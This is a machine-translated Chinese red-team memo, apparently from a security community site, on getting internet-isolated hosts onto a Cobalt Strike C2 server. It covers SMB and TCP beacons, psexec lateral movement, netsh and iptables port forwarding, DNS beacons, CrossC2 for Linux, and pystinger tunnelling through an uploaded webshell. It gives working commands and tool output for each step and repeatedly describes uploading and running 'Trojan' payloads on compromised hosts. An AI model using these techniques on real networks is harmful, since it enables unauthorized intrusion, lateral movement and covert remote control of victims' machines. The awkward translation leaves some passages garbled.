The source of the original text is ： Qianxin attack and Defense Community - No online line CS All kinds of postures (butian.net)

It is common to not go out of the network , go online CS The way , As a memo .

The following screenshots are taken at different times / Environment interception ,IP It's going to be different

0x01 There is a transfer machine

There is a transfer machine , This machine is out of the network , This is the most common case .

Often it's taking down an edge machine , It has multiple network cards , The intranet machines are not out of the network . In this case, take this edge machine for transfer , You can go online .

The topology is roughly as follows :

Online method 1 ： SMB Beacon

Introduce

website ：SMB Beacon Use named pipes through the parent Beacon To communicate , When two Beacons After connection , Son Beacon From father Beacon Get task and send .

Because connected Beacons Use Windows Named pipes for communication , This traffic is encapsulated in SMB Agreement , therefore SMB Beacon Relative concealment , It can work wonders around the firewall .

Use

such Beacon Require to have SMB Beacon The host of must accept ports 445 Connections on .

Derive a SMB Beacon Method ： stay Listner Generate SMB Beacon> The target host > Right click > spawn > Select the corresponding Listener> go online

Or in the Beacon Using commands in spawn smb（smb For my smb listener name ）

The use of plug-in , Or with port scanning , Scan intranet machines

Go to view , Choose a goal

Use psexec

Select a hash, choice smb Listeners and corresponding sessions

You can go online

After running successfully, you can see ∞∞ This character , This is derived SMB Beacon.

Currently connected , You can Beacon On the use of link <ip> Command link it or unlink <ip> Command to disconnect it .

such Beacon There are many applications in the horizontal penetration of the intranet . It can be used in Intranet environment ipc $ Generated SMB Beacon Upload to the target host for execution , But the target host will not go online directly , We need to use the link command ourselves (link <ip>) To connect it .

Online method 2 ： transit listener(Reverse TCP Beacon)

In fact, it is similar to method 1

The following will be automatically configured

Then it is the same as the above method , Discover the intranet host and know the account and password ,psexec Lateral transmission , Select transit listener

Online method 3 ：HTTP agent

The transfer machine does not need to be online

Use goproxy Act as agent for the project , Project address ：

https://github.com/snail007/goproxy

The process ：

1. Upload proxy.exe To web The server ( Edge host ), stay 8080 Open port http agent

C:\proxy.exe http -t tcp -p "0.0.0.0:8080" --daemon

2. use netsh The command will access the intranet ip 192.168.111.131 Of 822 port ( Must be an unused port , Otherwise it will fail ) Traffic is redirected to the Internet ip 192.168.1.88 Of 8080 port

netsh interface portproxy add v4tov4 listenaddress=192.168.111.131 listenport=822 connectaddress=192.168.1.88 connectport=8080

3. establish listener, The configuration is as follows

4. Generate stageless payload, Execute on the business server , Successful launch

Connection process

192.168.111.236  → 192.168.111.131:822→ 192.168.1.88:8080→ C2(192.168.1.89)

Online method 4 、TCP Beacon( positive )

• Forward connection
• and SMB Beacon similar . Also need a father beacon
• SMB Beacon,TCP Beacon And Cobalt Strike Derived from payload Compatible with most actions of . Except for some Require explicit stager User driven attacks （ such as ： Attacks → Packages 、 Attacks → Web Drive-by ）.

test ：

Generate a tcp beacon

Use this beacon Generate a stageless Form of Trojan horse ：

Upload to the target machine to run ：

In the transfer machine Beacon Use in connect [ip address] [port] Command forward connection , You can go online ：

To destroy one Beacon link , Use in the console of the parent or child session unlink [ip address] [session PID] . in the future , You can use the same host （ Or other hosts ） Reconnect to TCP Beacon.

Online method 5 、 Use pystinger Forwarding by proxy

pystinger Detailed use of See the following chapter . Here is just a simple demonstration ：

You don't usually put pystinger Used in this scenario

Test environment ：

attack kali：192.168.1.35

web The server ：192.168.1.70、192.168.111.129

Business server ：192.168.111.236

The process ：

1. Upload proxy.php To WEB Server website directory , Normal access returns UTF-8

web Server extranet ip by 192.168.1.70

Upload stinger_server.exe, perform

start stinger_server.exe 0.0.0.0

attack (192.168.1.89) On the implementation

./stinger_client -w http://192.168.1.70/proxy.php -l 127.0.0.1 -p 60000

At this point web Server's 60020 Port forward to vps Of 60020 On the port

CS Set listening ,HTTP Hosts For the intranet of the transfer machine ip, Port is 60020：

Use psexec Move horizontally , choice listener by pystinger, Or directly generate payload Execute on the business host , Business intranet host 192.168.111.236 You can successfully go online ：

Add ： The transfer machine is Linux

HTTP agent ( The transfer machine does not need to be online )

The method of use is the same as method 3 above . Just use iptables forward ：

echo 1 >/proc/sys/net/ipv4/ip_forward

iptables -A PREROUTING -p tcp -d 192.168.111.131 --dport 822 -j DNAT --to-destination 192.168.1.88:8080

iptables -A POSTROUTING -p tcp -d 192.168.1.88 --dport 8080 -j SNAT --to-source 192.168.111.131

test ：

Transfer machines (192.168.111.142)

attack

Generate stageless payload, Execute... On the target machine , Successful launch

Connection process ：( Re cut graph , The port has been changed 8080->8081)

192.168.111.140 → 192.168.111.142:8080→ 192.168.111.142:8081→ 192.168.111.131:81(C2)

Use pystinger Forwarding by proxy

And above Online method 5 equally , establish pystinger After the connection , Directly generate payload Execute on the business host , Business intranet host 192.168.111.236 You can successfully go online ..

CrossC2

Through other machines Beacon You can go online Linux machine

CrossC2 Use

Used to go online Linux or MacOS machine

Project address ： 【 Be sure to download the corresponding version 】

https://github.com/gloxec/CrossC2

To configure ：

( I'm here Windows Running on teamserver)

Create a https monitor ：

Generated payload

( In other ways )

If you can't generate , It can also be generated directly from the command line

Generated after , Upload to Linux machine , function , You can go online ：

install CrossC2Kit plug-in unit , Enrich beacon The function of

The intranet machine is online CS:

Transit Linux After the machine goes online , That is, you can use the above method to launch the intranet machine .

TCP Beacon：

Upload to the target machine to run .

And then in Linux beacon Lower connection ：

After going online, there is a black box ,checkin Just a second

It is still recommended to use the above two methods .

0x02 Edge machines only DNS Protocol outgoing

DNS go online CS

One 、 preparation

1） domain name ,godaddy ：yokan.xxx
2）vps, Firewall opening UDP port 53 : 82.xxx.xxx.19

3）cobalt strike 4.1

Two 、 Domain name settings

1） Set resolution

To configure A Record set to vps Of ip,cs Also configured in vps On

Configure several ns Record Point to just A Record the corresponding domain name

Once the configuration is complete ping test.yokan.xxx Sure ping through

vps Check out 53 Port usage , Stop vps Of 53 Port services

systemctl stop systemd-resolved

2）cs Set listening

![image-

All are ns Recorded domain name ,DNS Host(Stager) Just choose one of them .

3）nslookup see , Successfully parsed ：

Be careful ： The address of the response 74.125.196.113, This is with profile In the setting of

3、 ... and 、cs go online

Generate cs Of stageless Online horse , Go live

stageless Horse dns Yes x64 edition , stager No,

After going online, there is a black box , Need to use checkin Order to let dns beacon Forced loopback teamserver

PS: Need to wait a little longer

In this way, you can interact normally ：

0x03 The edge machine does not go out of the network

Method 1 、TCP Beacon Forward connection

<font color='red'> Application scenarios ： All protocols of the edge machine are not out of the network , But you can access .</font >

Use ：

Let your attacker go online first

then , Such as " Online method 4 " equally , Use TCP Beacon Generate a stageless Form of Trojan horse , Upload to the target machine , And run .

On the attack plane ( Transfer machines ) Of Beacon Use in connect [ip address] [port] Command forward connection , You can go online ：

Method 2 、 Use pystinger( Venomous sting ) Tools

<font color='red'> Application scenarios ： All protocols of the edge machine are not out of the network , But exist web service , Have got webshell.</font >

Project address :

https://github.com/FunnyWolf/pystinger

Simple principle ：

Pystinger To implement intranet reverse proxy , utilize http The protocol maps the target machine port to cs Server listening port , Can only be accessed in web The service can be online without going out of the network cs

Use

Address :

https://github.com/FunnyWolf/pystinger/blob/master/readme_cn.md

Here is a direct copy ：

Assume that the domain name of the non outgoing server is  http://example.com:8080 , Server intranet IP The address is 192.168.3.11

SOCK4 agent

• proxy.jsp Upload to the target server , Make sure  http://example.com:8080/proxy.jsp  You can visit , Page back  UTF-8
• take stinger_server.exe Upload to the target server , Ant sword / The ice scorpion performs start D:/XXX/stinger_server.exe Start server

Don't run it directly D:/XXX/stinger_server.exe, It can lead to tcp Disconnection

• vps perform ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
• The following output indicates success

[email protected]:~# ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...
2020-01-06 21:12:47,674 - INFO - 622 - Local listen check pass
2020-01-06 21:12:47,674 - INFO - 623 - Socks4a on 127.0.0.1:60000
2020-01-06 21:12:47,674 - INFO - 628 - WEBSHELL checking ...
2020-01-06 21:12:47,681 - INFO - 631 - WEBSHELL check pass
2020-01-06 21:12:47,681 - INFO - 632 - http://example.com:8080/proxy.jsp
2020-01-06 21:12:47,682 - INFO - 637 - REMOTE_SERVER checking ...
2020-01-06 21:12:47,696 - INFO - 644 - REMOTE_SERVER check pass
2020-01-06 21:12:47,696 - INFO - 645 - --- Sever Config ---
2020-01-06 21:12:47,696 - INFO - 647 - client_address_list => []
2020-01-06 21:12:47,696 - INFO - 647 - SERVER_LISTEN => 127.0.0.1:60010
2020-01-06 21:12:47,696 - INFO - 647 - LOG_LEVEL => INFO
2020-01-06 21:12:47,697 - INFO - 647 - MIRROR_LISTEN => 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 647 - mirror_address_list => []
2020-01-06 21:12:47,697 - INFO - 647 - READ_BUFF_SIZE => 51200
2020-01-06 21:12:47,697 - INFO - 673 - TARGET_ADDRESS : 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 677 - SLEEP_TIME : 0.01
2020-01-06 21:12:47,697 - INFO - 679 - --- RAT Config ---
2020-01-06 21:12:47,697 - INFO - 681 - Handler/LISTEN should listen on 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 683 - Payload should connect to 127.0.0.1:60020
2020-01-06 21:12:47,698 - WARNING - 111 - LoopThread start
2020-01-06 21:12:47,703 - WARNING - 502 - socks4a server start on 127.0.0.1:60000
2020-01-06 21:12:47,703 - WARNING - 509 - Socks4a ready to accept

• It's already in vps127.0.0.1:60000 It starts a example.com On the intranet socks4a agent
• At this time, the target server's 127.0.0.1:60020 Mapping to vps Of 127.0.0.1:60020

cobalt strike Single host online

• proxy.jsp Upload to the target server , Make sure  http://example.com:8080/proxy.jsp  You can visit , Page back  UTF-8
• take stinger_server.exe Upload to the target server , Ant sword / The ice scorpion performs start D:/XXX/stinger_server.exe Start server

Don't run it directly D:/XXX/stinger_server.exe, It can lead to tcp Disconnection

• stinger_client Command line execution ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
• The following output indicates success

[email protected]:~# ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...
2020-01-06 21:12:47,674 - INFO - 622 - Local listen check pass
2020-01-06 21:12:47,674 - INFO - 623 - Socks4a on 127.0.0.1:60000
2020-01-06 21:12:47,674 - INFO - 628 - WEBSHELL checking ...
2020-01-06 21:12:47,681 - INFO - 631 - WEBSHELL check pass
2020-01-06 21:12:47,681 - INFO - 632 - http://example.com:8080/proxy.jsp
2020-01-06 21:12:47,682 - INFO - 637 - REMOTE_SERVER checking ...
2020-01-06 21:12:47,696 - INFO - 644 - REMOTE_SERVER check pass
2020-01-06 21:12:47,696 - INFO - 645 - --- Sever Config ---
2020-01-06 21:12:47,696 - INFO - 647 - client_address_list => []
2020-01-06 21:12:47,696 - INFO - 647 - SERVER_LISTEN => 127.0.0.1:60010
2020-01-06 21:12:47,696 - INFO - 647 - LOG_LEVEL => INFO
2020-01-06 21:12:47,697 - INFO - 647 - MIRROR_LISTEN => 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 647 - mirror_address_list => []
2020-01-06 21:12:47,697 - INFO - 647 - READ_BUFF_SIZE => 51200
2020-01-06 21:12:47,697 - INFO - 673 - TARGET_ADDRESS : 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 677 - SLEEP_TIME : 0.01
2020-01-06 21:12:47,697 - INFO - 679 - --- RAT Config ---
2020-01-06 21:12:47,697 - INFO - 681 - Handler/LISTEN should listen on 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 683 - Payload should connect to 127.0.0.1:60020
2020-01-06 21:12:47,698 - WARNING - 111 - LoopThread start
2020-01-06 21:12:47,703 - WARNING - 502 - socks4a server start on 127.0.0.1:60000
2020-01-06 21:12:47,703 - WARNING - 509 - Socks4a ready to accept

• cobalt strike Add listening , Port selection output information RAT Config Medium Handler/LISTEN Port in ( Usually it is 60020),beacons by 127.0.0.1
• Generate payload, After uploading to the host

cobalt strike Multi host Online

• proxy.jsp Upload to the target server , Make sure  http://example.com:8080/proxy.jsp  You can visit , Page back  UTF-8

• take stinger_server.exe Upload to the target server , Ant sword / The ice scorpion performs

  start D:/XXX/stinger_server.exe 192.168.3.11
  

  Start server

192.168.3.11 You can change to 0.0.0.0

• stinger_client Command line execution ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
• The following output indicates success

[email protected]:~# ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...
2020-01-06 21:12:47,674 - INFO - 622 - Local listen check pass
2020-01-06 21:12:47,674 - INFO - 623 - Socks4a on 127.0.0.1:60000
2020-01-06 21:12:47,674 - INFO - 628 - WEBSHELL checking ...
2020-01-06 21:12:47,681 - INFO - 631 - WEBSHELL check pass
2020-01-06 21:12:47,681 - INFO - 632 - http://example.com:8080/proxy.jsp
2020-01-06 21:12:47,682 - INFO - 637 - REMOTE_SERVER checking ...
2020-01-06 21:12:47,696 - INFO - 644 - REMOTE_SERVER check pass
2020-01-06 21:12:47,696 - INFO - 645 - --- Sever Config ---
2020-01-06 21:12:47,696 - INFO - 647 - client_address_list => []
2020-01-06 21:12:47,696 - INFO - 647 - SERVER_LISTEN => 127.0.0.1:60010
2020-01-06 21:12:47,696 - INFO - 647 - LOG_LEVEL => INFO
2020-01-06 21:12:47,697 - INFO - 647 - MIRROR_LISTEN => 192.168.3.11:60020
2020-01-06 21:12:47,697 - INFO - 647 - mirror_address_list => []
2020-01-06 21:12:47,697 - INFO - 647 - READ_BUFF_SIZE => 51200
2020-01-06 21:12:47,697 - INFO - 673 - TARGET_ADDRESS : 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 677 - SLEEP_TIME : 0.01
2020-01-06 21:12:47,697 - INFO - 679 - --- RAT Config ---
2020-01-06 21:12:47,697 - INFO - 681 - Handler/LISTEN should listen on 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 683 - Payload should connect to 192.168.3.11:60020
2020-01-06 21:12:47,698 - WARNING - 111 - LoopThread start
2020-01-06 21:12:47,703 - WARNING - 502 - socks4a server start on 127.0.0.1:60000
2020-01-06 21:12:47,703 - WARNING - 509 - Socks4a ready to accept

• cobalt strike Add listening , Port selection RAT Config Medium Handler/LISTEN Port in ( Usually it is 60020),beacons by 192.168.3.11(example.com The Intranet IP Address )
• Generate payload, After uploading to the host
• When moving horizontally to other hosts, you can payload Point to 192.168.3.11:60020 Can realize the online line

customized Header And proxy

• If webshell Need configuration Cookie perhaps Authorization, It can be done by --header Parameter configuration request header

--header "Authorization: XXXXXX,Cookie: XXXXX"

• If webshell You need to access... Through a proxy , It can be done by --proxy Setting agent

--proxy "socks5:127.0.0.1:1081"

test

attack ：192.168.1.89

Suppose we are taking a target host , But you can't connect to the Internet .

Use  pystinger  Tool execution CS go online , Download address , adopt  webshell  Implement intranet  SOCK4  agent , Port mapping can make the target not out of the network CS go online .

First upload the corresponding version script to the target server .

take stinger_server.exe Upload to the target server , Ant sword / The ice scorpion performs start stinger_server.exe Start server

hold  stinger_client  Upload to  teamserver  The server ,-w Appoint proxy Of url Address operation .

chmod +x stinger_client
./stinger_client -w http://192.168.1.70/proxy.php -l 127.0.0.1 -p 60000

CS New listener , Set as the intranet of the target machine IP, Port default 60020.(teamserver Server and execution stinger_client It should be the same server )

Create a Trojan , Upload the target server and execute . You can see CS There is a new online host .